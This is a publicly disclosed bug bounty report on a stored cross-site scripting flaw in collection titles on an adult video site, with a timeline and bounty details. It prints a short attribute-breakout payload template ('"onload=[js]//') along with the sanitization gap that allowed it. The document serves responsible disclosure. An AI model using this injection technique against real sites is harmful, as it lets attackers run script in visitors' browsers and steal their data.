Stored XSS on the https://www.redtube.com/users/[profile]/collections
State Resolved (Closed)
Disclosed publicly 2018-10-10T14:56:36.525Z
Reported To
Weakness Cross-site Scripting (XSS) - Stored
Bounty $1,500
Collapse
Summary by sp1d3rs

Stored XSS on the /users/<username>/collections and /users/<username>/favorites endpoints with same root cause. Discovered in the day of public program launch.
Request interception wasn't necessary.

Context:

<img src="..." alt="[injection]">

Sanitized characters:

<>

Payload:

"onload=[js]//

Severity was set due to the factors such as: number of potential users affected, attack complexity, no user interaction vector, and possibility to steal sensitive information or bypass CSRF protection on the user's side.
I had previously some experience with triage team, so in this case it was enough to demonstrate simple popup, without complex payload.
Thanks to the team for great report handling and bounty!

Summary by sp1d3rs

Researcher successfully closed the image 'alt' attribute and injected javascript by submitting an XSS payload as the collection title. This led to stored cross-site scripting on the user's collections page, executed against any users who visited the user's collections. The user's favorites page was also affected if the collection featuring the payload was present.

Timeline
submitted a report to Redtube .
2018-07-10T16:20:56.267Z

Regards,
Frans

  • 0 attachments:
dsimmons Activities::BugTriaged
2018-07-10T20:33:20.100Z


sp1d3rs Activities::Comment
2018-07-11T00:24:56.040Z


Activities::BountyAwarded
2018-07-24T16:20:49.847Z


ghooks Activities::BugResolved
2018-09-11T08:56:30.614Z


sp1d3rs Activities::AgreedOnGoingPublic
2018-09-16T23:49:05.941Z


dsimmons Activities::AgreedOnGoingPublic
2018-10-10T14:56:36.473Z


dsimmons Activities::ReportBecamePublic
2018-10-10T14:56:36.542Z